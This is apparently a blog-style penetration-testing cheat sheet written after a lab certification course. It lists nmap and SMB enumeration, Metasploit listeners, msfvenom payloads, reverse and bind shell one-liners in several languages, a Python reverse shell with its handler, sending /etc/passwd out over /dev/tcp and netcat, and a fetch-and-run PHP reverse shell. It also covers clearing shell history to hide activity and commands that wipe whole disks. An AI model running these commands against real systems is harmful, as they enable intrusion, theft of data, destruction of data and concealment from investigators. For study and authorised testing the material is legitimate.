Recently I tried and passed (Certificate ID: 1837845437) the Penetration Testing Course by Virtual Hacking Labs, in which you need to complete at least 20 lab machines successfully in their virtual environment.
The environment is very easy to use: a VM with Parrot or Kali to complete/exploit as many servers as possible, with nice, good documentation and guides. Totally recommended if you want to learn by doing something more than reading.
Information Gathering
DNS
# All record types for a name
nslookup -type=any <DOMAIN>
# Zone transfer (AXFR) against one specific name server (-l already implies AXFR); only misconfigured servers allow it
host -t axfr -l <DOMAIN> <DNSSERVER>
# Mail exchangers, then everything the resolver will hand out
dig -t mx <DOMAIN>
dig -t any <DOMAIN>
Nmap
# Service discovery
nmap -sV <IP>
nmap -sV -O <IP>
# Full TCP range with OS detection, version detection, default scripts and traceroute (-A); -Pn skips host discovery for targets that drop ping
nmap -p 1-65535 -T4 -A -v -Pn <IP>
# Host discovery
nmap -sn <NETWORK>
# TCP connect scan
nmap -sT <IP>
# TCP SYN scan
nmap -sS <IP>
# TCP ACK scan
nmap -sA <IP>
# TCP Window scan
nmap -sW <IP>
# TCP Maimon scan
nmap -sM <IP>
## TCP Null scan: no flags set at all (flag byte is 0). Null, FIN and Xmas probes are not SYNs,
## so stateless packet filters often let them through; a RST reply means closed, no reply means
## open|filtered. Windows and many Cisco devices answer RST on every port, so they show every
## port as closed under these three scans.
nmap -sN <IP>
## TCP FIN scan: only the FIN bit set
nmap -sF <IP>
## TCP Xmas scan: FIN, PSH and URG set, lighting the packet up like a Christmas tree
nmap -sX <IP>
# UDP port scanning (slow: open UDP ports usually stay silent, so nmap has to wait for each probe to time out)
nmap -sU <IP>
# UDP and TCP in one run, with U:/T: prefixes on the port list
nmap -sU -sS -p U:137-139,T:137-139,445 <IP>
# Aggressive scan
nmap -A <IP>
# Read the list of targets using a text file
nmap -iL IPs.txt
# Excluding hosts/networks (comma-separated list, no spaces)
nmap <NETWORK> --exclude <IP>,<IP>
# Scripting
nmap -p 139,445 --script=smb-vuln* <IP>
nmap -sV --script http-wordpress-enum --script-args limit=25 <IP>
nmap --script ftp-vsftpd-backdoor -p 21 <IP>
nmap -sV --script irc-unrealircd-backdoor -p 6667 <IP>
# Show all packets sent and received
nmap --packet-trace -p 22 <IP>
# Show host interfaces and routes
nmap --iflist
# Scan IPv6
nmap -6 <IPv6>
nmap -v -A -6 <IPv6>
# Save output (-oN normal, -oG greppable, -oX XML; -oA <BASENAME> writes all three at once)
nmap -oN <FILE> <IP>
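Greppable output is the format worth keeping from a range scan, because the next phase (SMB scripts against every host with 445, web enumeration against every 80/443) needs a host-to-port map rather than a report. The parser below is an added example, not part of the original page or of nmap itself; the scan output it parses is constructed, and the field layout it assumes is the standard `-oG` one (tab-separated fields, port entries of the form port/state/proto/owner/service/rpcinfo/version/).

```python
import re

# Constructed sample of what `nmap -sV -oG scan.gnmap 10.10.10.0/24` writes (not a real scan).
# Fields on a "Host:" line are tab-separated; each port entry has the form
#   port/state/proto/owner/service/rpcinfo/version/
# and nmap rewrites any "/" inside a version string as "|", so "/" is a safe delimiter.
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sV -oG scan.gnmap 10.10.10.0/24",
    "Host: 10.10.10.5 ()\tStatus: Up",
    "Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.38 ((Debian))/, 139/filtered/tcp//netbios-ssn///"
    "\tIgnored State: closed (997)",
    "Host: 10.10.10.7 ()\tStatus: Up",
    "Host: 10.10.10.7 ()\tPorts: 445/open/tcp//microsoft-ds//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "161/open|filtered/udp//snmp///\tIgnored State: closed (998)",
    "Host: 10.10.10.9 ()\tStatus: Up",
    "# Nmap done at Mon Jan  1 10:03:12 2024 -- 256 IP addresses (3 hosts up) scanned in 192.40 seconds",
])

# One port entry; states such as "open|filtered" contain "|", hence [^/]+ rather than \w+.
PORT_ENTRY = re.compile(r"(\d+)/([^/]+)/([^/]+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, service, version), ...]} with open ports only, sorted by port.
    A host that was up but exposed nothing is kept with an empty list so it is not forgotten."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # "# Nmap ..." banner and footer lines
        fields = line.split("\t")
        host = fields[0].split()[1]  # "Host: 10.10.10.5 (name)" -> "10.10.10.5"
        for field in fields[1:]:
            if field.startswith("Status: Up"):
                results.setdefault(host, [])
            elif field.startswith("Ports:"):
                for port, state, proto, _owner, service, _rpc, version in PORT_ENTRY.findall(field):
                    if state == "open":  # drop filtered / open|filtered / closed
                        results.setdefault(host, []).append((int(port), proto, service, version.strip()))
    for ports in results.values():
        ports.sort()
    return results


def hosts_with_port(results, port, proto="tcp"):
    """Target list for a follow-up scan, e.g. every host with 445/tcp for --script smb-vuln*."""
    return sorted(host for host, ports in results.items()
                  if any(p == port and pr == proto for p, pr, _svc, _ver in ports))


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for host, ports in sorted(parsed.items()):
        print(host, ports)
    print("hosts for smb-vuln*:", ",".join(hosts_with_port(parsed, 445)))
```

The output of `hosts_with_port()` is what goes into a second `nmap -iL` list or straight onto the command line of the scripted scans above; filtered and open|filtered ports are dropped on purpose, since they are guesses rather than confirmed services.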
MyIP
wget -qO- http://ipecho.net/plain; echo
SMB
# List shares; press Enter at the password prompt (or add -N) for a null session
smbclient -L <IP>
# MS-RPC over a null session; then e.g. srvinfo, enumdomusers, querydominfo, enumdomgroups
rpcclient -U "" <IP>
# List shares with credentials (-U takes a username and prompts for the password)
smbclient -U <USER> -L <IP>
# Connect to a share; a second positional argument would be read as the password, so pass the user with -U
smbclient //<IP>/share -U <USER>
Exploitation
Search Exploits
nikto -h http://<IP>
# Search by the product and version strings nmap -sV returned
searchsploit <SERVICE> <VERSION>
sudo wpscan --url http://<IP>
Metasploit
Listener
- Windows
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <IP>
lhost => <IP>
msf exploit(handler) > set LPORT 4444
lport => 4444
msf exploit(handler) > run
- Linux
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST <IP>
LHOST => <IP>
msf exploit(multi/handler) > run
msfvenom
# Windows x86 staged meterpreter, shikata_ga_nai encoded, bad chars \x00\x0a\x0d\x26 excluded, emitted as a Python byte string
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
# JSP reverse shell packed as a deployable WAR (Tomcat manager and similar)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war > shell.war
# Linux x86 staged meterpreter as an ELF binary (chmod +x on the target before running it)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f elf > shell.elf
Privilege escalation
Linux privilege escalation notes
Windows privilege escalation notes
Common Windows Privilege Escalation Vectors
Check port
# Which process holds a given port (here 40001); +c 0 prints the full command name, -n skips DNS lookups
lsof +c 0 -n -i :40001
Reverse Shells
Upgrade shell
# Spawn a pseudo-terminal so that su, sudo, editors and tab completion work (use python3 where python is absent)
python -c 'import pty; pty.spawn("/bin/bash")'
Listener
nc -lvp 4444
Target
# Bash
bash -i >& /dev/tcp/<IP>/4444 0>&1
# Perl
perl -e 'use Socket;$i="<IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# PHP
php -r '$sock=fsockopen("<IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("<IP>",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Netcat without -e support (most modern builds): the mkfifo pipe trick
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <IP> 4444 >/tmp/f
# Netcat built with -e (nc.traditional, ncat)
nc -e /bin/sh <IP> 4444
# sh: open fd 196 read/write on the socket (/dev/tcp is a bash feature, so type this in bash) and hang a shell off it
exec 196<>/dev/tcp/<IP>/4444; sh <&196 >&196 2>&196
# Socat: full PTY with job control; pair it with a socat listener on the attacker side rather than nc
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444
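Both sides of the exchange the one-liners above perform, written out in Python as an added example (not from the original page): the target connects back and hands the socket to a shell as its stdin/stdout/stderr, and the attacker's handler is the `nc -lvp 4444` side with a scripted session in place of a keyboard. It runs against loopback with an OS-chosen port so it can be exercised offline; on an engagement only `reverse_shell()` runs on the target, with the attacker's IP and port, and the handler is netcat or the Metasploit multi/handler above.

```python
import socket
import subprocess
import threading


def reverse_shell(lhost, lport, shell="/bin/sh"):
    """Target side: connect back to LHOST:LPORT and run a shell with the socket as fds 0, 1 and 2.
    This is the Python one-liner above written out; plain `sh` (no -i) so that no prompt is
    interleaved with command output. Returns the shell's exit status."""
    s = socket.create_connection((lhost, lport))
    try:
        return subprocess.call([shell], stdin=s, stdout=s, stderr=s)
    finally:
        s.close()


def start_handler(lhost="127.0.0.1", lport=0):
    """Attacker side, step 1: bind the listener (`nc -lvp <PORT>`). lport=0 lets the OS pick a
    free port for the loopback demo; read it back with getsockname()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)
    return srv


def drive_session(srv, script, timeout=20.0):
    """Attacker side, step 2: block in accept() like nc does, send a script down the connection
    and collect everything the remote shell writes until it closes the socket. The script must
    end with `exit`, otherwise the shell keeps waiting for input and this times out."""
    srv.settimeout(timeout)
    conn, _peer = srv.accept()
    chunks = []
    with conn:
        conn.settimeout(timeout)
        conn.sendall(script.encode())
        while True:
            data = conn.recv(4096)
            if not data:  # shell exited and the target closed the socket
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def demo(script="echo shell-check; echo $((6*7)); exit\n"):
    """Wire both sides together on loopback; returns what the remote shell printed."""
    srv = start_handler()
    port = srv.getsockname()[1]
    target = threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True)
    target.start()  # stands in for the one-liner running on the victim
    try:
        return drive_session(srv, script)
    finally:
        srv.close()
        target.join(5)


if __name__ == "__main__":
    print(demo(), end="")
```

Nothing on the wire is encrypted or authenticated: anyone who can reach the listener port can connect to it, and anyone on the path sees the commands and output, which is why `socat` with an SSL listener or a meterpreter session is preferred on anything but a lab network.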
Bind Shell
Target
# Windows (nc.exe, which is built with -e)
nc -lvp 4444 -e cmd.exe
# Linux (needs a netcat built with -e; otherwise use the mkfifo variant from the reverse shell section)
nc -lvp 4444 -e /bin/sh
Attacker
nc <IP> 4444
Sending files
# bash only: /dev/tcp opens a TCP connection as fd 3; the listener just redirects the stream to a file
exec 3<>/dev/tcp/<IP>/4444 && cat /etc/passwd>&3
With Netcat
Listener:
netcat -l 4444 > received_file
Target:
netcat <IP> 4444 < original_file
Listener:
netcat -l 4444 | tar xzvf -
Target:
tar -czf - * | netcat <IP> 4444
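The netcat pushes above give no signal when the connection dies mid-transfer: the listener simply sees EOF and keeps a truncated file. The usual check is `sha256sum` on both ends. The added example below (not from the original page) does the same push over a raw socket on loopback with an OS-chosen port, hashes the bytes each side handled, and has a `drop_after` switch that simulates the link dropping so the mismatch is visible. The 160 KiB sample file is constructed, not a real /etc/passwd.

```python
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 64 * 1024


def sha256_file(path):
    """What `sha256sum <file>` prints on the sending side, before the transfer."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_file(srv, dest_path, timeout=20.0):
    """Listener side (`netcat -l 4444 > received_file`): accept one connection, write the stream
    to dest_path and return the SHA-256 of the bytes that actually arrived."""
    srv.settimeout(timeout)
    conn, _peer = srv.accept()
    h = hashlib.sha256()
    with conn, open(dest_path, "wb") as out:
        conn.settimeout(timeout)
        for chunk in iter(lambda: conn.recv(CHUNK), b""):
            out.write(chunk)
            h.update(chunk)
    return h.hexdigest()


def send_file(host, port, src_path, drop_after=None):
    """Target side (`netcat <IP> 4444 < original_file`). drop_after=N simulates the link dying
    after N bytes: the socket is closed without any error, which is exactly what the listener
    sees on a real drop. Returns the number of bytes sent."""
    sent = 0
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            if drop_after is not None and sent + len(chunk) > drop_after:
                s.sendall(chunk[:drop_after - sent])
                return drop_after
            s.sendall(chunk)
            sent += len(chunk)
    return sent


def transfer(src_path, dest_path, drop_after=None):
    """Run both ends on loopback. Returns (ok, expected_digest, received_digest), where ok is the
    comparison a practitioner does by hand with sha256sum on both machines."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    sender = threading.Thread(target=send_file, args=("127.0.0.1", port, src_path, drop_after), daemon=True)
    sender.start()
    try:
        received = receive_file(srv, dest_path)
    finally:
        srv.close()
        sender.join(10)
    expected = sha256_file(src_path)
    return expected == received, expected, received


def demo(drop_after=None):
    """Constructed sample input: 5000 copies of one passwd-style line (160000 bytes).
    Returns (ok, source_size, received_size)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "original_file")
        dst = os.path.join(tmp, "received_file")
        with open(src, "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/bash\n" * 5000)
        ok, _expected, _received = transfer(src, dst, drop_after)
        return ok, os.path.getsize(src), os.path.getsize(dst)


if __name__ == "__main__":
    print("complete transfer:", demo())
    print("link dropped after 100000 bytes:", demo(drop_after=100000))
```

The tar pipe variant above has the same blind spot with one difference: a truncated gzip stream makes `tar xzvf -` complain at the end, which is a hint but not a guarantee, so the hash comparison is still the check to do.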
File upload in Windows with PowerShell
[Windows / DOS / PowerShell] File upload in command line
PHP web and reverse shells
# The script's $ip and $port are hardcoded: edit them (and start the listener) before running it
wget -O /tmp/php_shell.php https://raw.githubusercontent.com/JohnTroony/php-webshells/master/php-reverse-shell.php && php -f /tmp/php_shell.php
Covering the tracks
Avoiding history
# Run these at the start of the session: bash writes HISTFILE only on exit, so emptying or unsetting it means nothing from this session is saved; set +o history stops recording in memory as well
export HISTFILE=
unset HISTFILE
set +o history
Clear history
history -c
rm -rf .bash_history
touch .bash_history (invasive: leaves a fresh timestamp on the file)
Destroy
# Lab-only wipes. GNU rm refuses "/" unless --no-preserve-root is given; find -exec needs a command and a terminating \;
rm -rf --no-preserve-root /
find / -type f -exec rm -f {} \;
mkfs.ext3 /dev/sda
dd if=/dev/zero of=/dev/sda bs=1M
Resources
escaping-restricted-linux-shells